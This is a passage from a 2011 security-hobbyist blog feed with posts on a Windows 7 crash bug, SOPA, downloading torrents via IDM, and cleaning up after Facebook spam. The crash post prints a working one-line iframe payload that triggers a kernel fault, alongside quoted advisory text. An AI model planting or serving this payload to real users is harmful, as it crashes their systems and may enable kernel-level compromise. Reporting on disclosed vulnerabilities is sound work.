href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1371864891833442645'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1371864891833442645'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/contribute-to-hackingalert-submit.html' title='Contribute to HackingAlert : Submit An Article on Technologies that will heatup in 2012'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' 
src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-2CMesgMCtX4/Tv2NoNHdUNI/AAAAAAAABAM/yh6GdCqj1EM/s72-c/driving.jpg" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8044439991634909724</id><published>2011-12-25T15:23:00.001+05:30</published><updated>2011-12-25T15:23:53.873+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="windows 7"/><title type='text'>A simple HTML tag to crash 64-bit Windows 7</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt; &lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-dSYzfJaAguQ/TvbynfxjC7I/AAAAAAAABAA/62zBHfr85c8/s1600/screen.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-dSYzfJaAguQ/TvbynfxjC7I/AAAAAAAABAA/62zBHfr85c8/s1600/screen.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span 
style=&quot;font-family: inherit; font-size: large;&quot;&gt;&amp;lt;iframe height=&#39;18082563&#39;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Yea that&#39;s true. This small ( not exactly small) iframe is powerful enough to crash down a 64 bit Win7 system to the famous Blue Screen Of Death (BSoD). This vulnerability has been recently reported by &lt;a href=&quot;https://twitter.com/#!/w3bd3vil/status/148454992989261824&quot; target=&quot;_blank&quot;&gt;w3bd3vil&lt;/a&gt; (awesome work!!)&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;This has been tested on Windows 7, 64 bit version, running Safari. I hate the blue screen of death so didn&#39;t bother about testing it on other browsers. Microsoft is still assessing the impact of the vulnerability. Here are the details from a security advisory.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Description&lt;/b&gt;&lt;br /&gt;A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user&#39;s system.&lt;br /&gt;&lt;br /&gt;The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large &quot;height&quot; attribute viewed using the Apple Safari browser.&lt;br /&gt;&lt;br /&gt;Successful exploitation may allow execution of arbitrary code with kernel-mode privileges.&lt;br /&gt;&lt;br /&gt;The vulnerability is confirmed on a fully patched Windows 7 Professional 64-bit. 
Other versions may also be affected.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Solution&lt;/b&gt;&lt;br /&gt;No effective solution is currently available.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Provided and/or discovered by&lt;/b&gt;&lt;br /&gt;webDEViL&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Original Advisory&lt;/b&gt;&lt;br /&gt;https://twitter.com/#!/w3bd3vil/status/148454992989261824&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8044439991634909724/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/simple-html-tag-to-crash-64-bit-windows.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8044439991634909724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8044439991634909724'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/simple-html-tag-to-crash-64-bit-windows.html' title='A simple HTML tag to crash 64-bit Windows 7'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-dSYzfJaAguQ/TvbynfxjC7I/AAAAAAAABAA/62zBHfr85c8/s72-c/screen.jpg" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-7038218331763209466</id><published>2011-12-24T01:36:00.001+05:30</published><updated>2011-12-24T02:00:25.178+05:30</updated><category 
scheme="http://www.blogger.com/atom/ns#" term="internet censorship"/><category scheme="http://www.blogger.com/atom/ns#" term="SOPA"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>SOPA - the end of internet as we know it!!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-0RRWNUHFqMQ/TvTelq_HmAI/AAAAAAAAA_g/JHb3nLtPLs0/s1600/sopa.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-0RRWNUHFqMQ/TvTelq_HmAI/AAAAAAAAA_g/JHb3nLtPLs0/s1600/sopa.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Imagine an internet where you don&#39;t have video uploading websites like youtube or vimeo. Imagine an internet where you don&#39;t have photo uploading sites like flickr and photobucket. Imagine an internet where you can blog not by your choice, but by that of others. At the worst, imagine an internet where a Google search for &quot;download Firefox&quot; will return no results.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;An internet of this kind will not be far away if SOPA becomes a law. Let me start with the beginning. What exactly is SOPA? What restrictions will it impose, and what pros and cons will it have on the present internet scenario?&lt;br /&gt;&lt;br /&gt;The Stop Online Piracy Act (SOPA), also known as H.R. 3261, is a bill that was introduced in the United States House of Representatives on October 26, 2011, by Representative Lamar Smith. The bill expands the ability of U.S. 
law enforcement and copyright holders to fight online trafficking in copyrighted intellectual property and counterfeit goods.&lt;br /&gt;Let&#39;s make it simple and Indian. If you post anything on your blog that is copyrighted material then you can face trial if the copyright owner complains about it. In the simplest of cases you will have to remove your website/blog, and in worse situations you can face trial as well.&amp;nbsp;The bill would allow the U.S. Department of Justice, as well as copyright holders, to seek court orders against websites accused of enabling or facilitating copyright infringement. Depending on who requests the court orders, the actions could include barring online advertising networks and payment facilitators such as PayPal from doing business with the allegedly infringing website, barring search engines from linking to such sites, and requiring Internet service providers to block access to such sites. The bill would make unauthorized streaming of copyrighted content a felony. The bill also gives immunity to Internet services that voluntarily take action against websites dedicated to infringement, while making liable for damages any copyright holder who knowingly misrepresents that a website is dedicated to infringement. This bill will give full internet censorship to USA. This bill clearly protects the rights of US intellectual property holders around the globe. A copyright owner of USA can sue a person in India through this bill. I would say this is America&#39;s own version of &quot;The great Firewall of China&quot;.&lt;br /&gt;&lt;br /&gt;The bill has met with lots of protest, especially online. In one of the most popular cases, Godaddy, a famous domain service provider who supported this bill is now facing a mass boycott. People are shifting their domains from Godaddy to other service providers. The big shocker came when companies like Microsoft, Apple, Adobe and other 26 giants silently supported the bill. 
I will explain you why they are in support. The opposing companies published a complete add in the New York Times (nice to see Facebook and Google standing together):&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-T8xoWA5yMjo/TvTX27sVmII/AAAAAAAAA_U/FnTCWYb2QmE/s1600/add.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;http://3.bp.blogspot.com/-T8xoWA5yMjo/TvTX27sVmII/AAAAAAAAA_U/FnTCWYb2QmE/s640/add.jpg&quot; width=&quot;374&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Why SOPA can be a danger to internet?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Let&#39;s look at the following points to understand how this bill can be a danger to the present internet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bill targets more than infringing website&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A Center for Democracy and Technology paper says that the bill &quot;targets an entire website even if only a small portion hosts or links to some infringing content.&quot; What does this means? If someone posts a video on youtube that infringes copyright then the entire youtube can be brought down under this act ( nop I am in no mood for kidding !!). Well this is crazy. I think now you might have understood why Microsoft is supporting the bill. Even though a recent&amp;nbsp;amendment&amp;nbsp;says that the bill will not affect websites which publishes user content. So this can protect youtube,facebook etc but the bill still lays concerns about how these websites should deal with infringing content. In an excellent post, EFF has clearly mentioned how websites like vimeo, flickr and Etsy can face troubles. 
&lt;a href=&quot;https://www.eff.org/deeplinks/2011/11/whats-blacklist-three-sites-sopa-could-put-risk&quot; target=&quot;_blank&quot;&gt;Read the article here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DNS filtering&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The bill says that DNS servers should filter any request from users that directs to websites which break copyrights. This means that USA can alone control the web traffic of the world to any domain or subdomain (seriously I am not kidding!!). This is clearly the biggest reason why this bill is facing a mass opposition from countries like Japan, Russia etc.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Threat to E-commerce&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Sites like Ebay and amazon sell millions of products online. They contain all types of items that you can think of. Filtering contents based on copyright will be a nightmare for such companies. It will kill lot or company resource and money. Mid-size and smaller E-commerce websites will have no choice other than selling only branded products or shut down their business. (no point of kidding!!)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Threat to Online Gaming, Cloud computing and free web hosting&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;People have talked less about this on the internet but I want to shed some light on this issue as well. Cloud technology is greatly facilitating small and mid scale companies to run their business without worrying about resource problems. But SOPA can greatly affect the cloud market&amp;nbsp;drastically. All the major cloud players are based in USA and if this act becomes a law then these companies will have to filter any content on the cloud that can infringe copyright. Now the question arises, how can these cloud service providing companies access the data of their customers? Will it not kill the very meaning of cloud? Why will I host my business data on a USA based cloud computing company then? 
(tough to say that I am not kidding!!)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Threat to information&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Last but not the least. As I said earlier that this bill will create America&#39;s version of &quot;The Great Firewall of China&quot; as it will force the DNS servers to filter out any copyright infringing website/blog from its users. Search engines like Google and Yahoo! will have to start filtering for search contents. Well the question again comes. Can you imagine how much resource will be needed to filter out 32 million US requests every minute for Google.&lt;br /&gt;&lt;br /&gt;SOPA has really created a dirty scene on the internet. Looking at the mass protest against this bill, Microsoft and Apple have finally showed some support for the bill by saying that &quot;It needs to be worked on&quot;. But this is not enough. Maybe its the time when all the internet companies should stand up together and forget their&amp;nbsp;rivalry&amp;nbsp;and greed for some time because if this Act becomes a Law then Only God Can Save The INTERNET.&lt;br /&gt;You can read the complete SOPA Act here. 
&lt;a href=&quot;http://judiciary.house.gov/hearings/pdf/112%20HR%203261.pdf&quot; target=&quot;_blank&quot;&gt;Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-FQHe8_aMf30/TvTe0lcRI3I/AAAAAAAAA_0/lOdSkHsJwbc/s1600/sopa2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-FQHe8_aMf30/TvTe0lcRI3I/AAAAAAAAA_0/lOdSkHsJwbc/s1600/sopa2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/7038218331763209466/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/sopa-end-of-internet-as-we-know-it.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7038218331763209466'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7038218331763209466'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/sopa-end-of-internet-as-we-know-it.html' title='SOPA - the end of internet as we know it!!'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-0RRWNUHFqMQ/TvTelq_HmAI/AAAAAAAAA_g/JHb3nLtPLs0/s72-c/sopa.PNG" height="72" 
width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-3032947020020653169</id><published>2011-12-19T12:04:00.000+05:30</published><updated>2011-12-19T12:04:22.460+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="tips and tricks"/><title type='text'>Downloading torrent files through IDM</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;I know, I know, I know that this is an old trick but I really had nothing new to post. I have been busy with my book so its getting tough to find out time for something new. But I will keep you posted with some new posts soon. Lets come back to today&#39;s post. Special thanks to - Hackdigital.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. First of all , you have to download the torrent file(.torrent) which you want to download.&lt;br /&gt;&lt;br /&gt;2. Then just go to the website &lt;a href=&quot;http://www.torcache.net/&quot;&gt;www.torcache.net&lt;/a&gt; and upload the torrent file that you have just downloaded and click on the cache! 
button&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-gepevynDw-s/Tu7Z3lLtfTI/AAAAAAAAA_A/YHeJUOW-PX4/s1600/torcache.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;312&quot; src=&quot;http://3.bp.blogspot.com/-gepevynDw-s/Tu7Z3lLtfTI/AAAAAAAAA_A/YHeJUOW-PX4/s640/torcache.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window.&lt;br /&gt;&lt;br /&gt;4. Then go to the website &lt;a href=&quot;http://www.torrific.com/&quot;&gt;www.torrific.com&lt;/a&gt; and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Z-xNa0Rdbvk/Tu7aSkBelHI/AAAAAAAAA_I/zqpDkhdqZAg/s1600/torrific.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;http://3.bp.blogspot.com/-Z-xNa0Rdbvk/Tu7aSkBelHI/AAAAAAAAA_I/zqpDkhdqZAg/s640/torrific.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. 
Just click on any link and you can see the download manager-IDM popping out for downloading the file.&lt;br /&gt;&lt;br /&gt;Now enjoy the ultimate Speed of IDM for downloading torrents too.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/3032947020020653169/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/downloading-torrent-files-through-idm.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/3032947020020653169'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/3032947020020653169'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/downloading-torrent-files-through-idm.html' title='Downloading torrent files through IDM'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-gepevynDw-s/Tu7Z3lLtfTI/AAAAAAAAA_A/YHeJUOW-PX4/s72-c/torcache.jpg" height="72" width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6936503226816985172</id><published>2011-12-16T15:17:00.000+05:30</published><updated>2011-12-17T14:06:25.477+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="facebook spam"/><title type='text'>5 Things to do when you are hit by a Facebook spam</title><content 
type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;These days there are two things that are spreading fast on facebook:&lt;br /&gt;First is the spam containing inappropriate content.&lt;br /&gt;Second is the photo people are sharing after they are hit by the spam( and putting all blame on hackers).&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Recently one of my friends pointed out a strange thing happening with his account. He tried to delete the spam but in turn it started spreading through his profile even though he didn&#39;t click the spam link. Well its tough to tell why this is happening but his problem shifted my&amp;nbsp;attention&amp;nbsp;back to the spam codes where &amp;nbsp;found a&amp;nbsp;buried&amp;nbsp;script which was doing quiet a fun with the cookies. 
I didn&#39;t notice that script while I posted about the &quot;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/it-happens-on-live-television-facebook.html&quot; target=&quot;_blank&quot;&gt;This&amp;nbsp;happens&amp;nbsp;on live television spam&lt;/a&gt;&quot;. Later today my friends problem brought my attention to that script. Anyways I dont want this tutorial to turn too geeky so I will speak simple language.&lt;br /&gt;Lets talk about 5 things that you can do to completely get rid of the spam in case you accidently( or knowingly) clicked it. The steps mentioned here are in order. So if you are a victim then follow all the five steps starting from step 1.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;1. Report as spam&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;(special thanks-sami ullah)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is the first&amp;nbsp;precautionary&amp;nbsp;step. Immideatley report the spam to facebook( dont click on delete). Reporting as spam automatically hides the link from your feed so dont take the risk of deleting it.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Bn8UphEOjFQ/TusP5-6c8LI/AAAAAAAAA-Q/2FtFzrT4hds/s1600/spam1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;124&quot; src=&quot;http://3.bp.blogspot.com/-Bn8UphEOjFQ/TusP5-6c8LI/AAAAAAAAA-Q/2FtFzrT4hds/s320/spam1.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;2. 
Disable the installed plugin&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;The recent spam asks you to install a missing plugin. So in case you have installed it, act fast to remove it. If you are using Firefox then go to Firefox &amp;gt; Add-ons &amp;gt; Extensions. Here you will find the malicious plugin. Click on Remove to get rid of it.&lt;br /&gt;For Chrome users, click on the small wrench icon at the right corner of the browser, then click on options and move to Extensions. Disable and remove the plugin from there.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;3. Switch to Https&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Immediately switch to the https version of facebook if you still haven&#39;t. This helps prevent session hijacking over the network and will prevent the http cookies created by the spam on your system from re-posting the link on your profile. It does not disable an extension that is still installed, so make sure step 2 is done first.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;4. Clear Cookies, Browsing history and Browser cache&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;(special Thanks - Aquib Ahmed)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The spam creates lots of fake facebook http cookies on your system which can re-post the spam links on your profile and can redirect you to other links as well. So it is highly recommended that you delete all the browser cookies. Clearing history can also help in cases where you may again accidentally click the link.&lt;br /&gt;You can go to Browser options to clear the cookies, history etc.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;5. 
Change the password&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Last but not the least. Change the facebook password. Your facebook account is precious to you so why to take the risk.&lt;br /&gt;&lt;br /&gt;These are a few steps you can follow to protect your account from spams. In case you have any other problem related to spam on your profile then add your comment here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;Update : Thanks to Anna.L.Walls&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6936503226816985172/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/5-things-to-do-when-you-are-hit-by.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6936503226816985172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6936503226816985172'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/5-things-to-do-when-you-are-hit-by.html' title='5 Things to do when you are hit by a Facebook spam'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s72-c/download" height="72" 
width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8416719529555694222</id><published>2011-12-13T03:25:00.000+05:30</published><updated>2011-12-13T03:25:06.365+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="facebook hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="facebook spam"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><title type='text'>&quot;It Happens on Live television&quot; Facebook spam demystified - A completely new form of Spam</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hello friends. I love facebook spams. The reason is that you will find the best use of javascript, flash, facebook plugins and of&amp;nbsp;coarse social engineering. There is always so much to learn. The last faebook spam which we looked at here in HackingAlert was the &quot;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/11/new-how-can-rihanna-do-this-facebook.html&quot; target=&quot;_blank&quot;&gt;How can Rehanna Do this&lt;/a&gt;&quot; 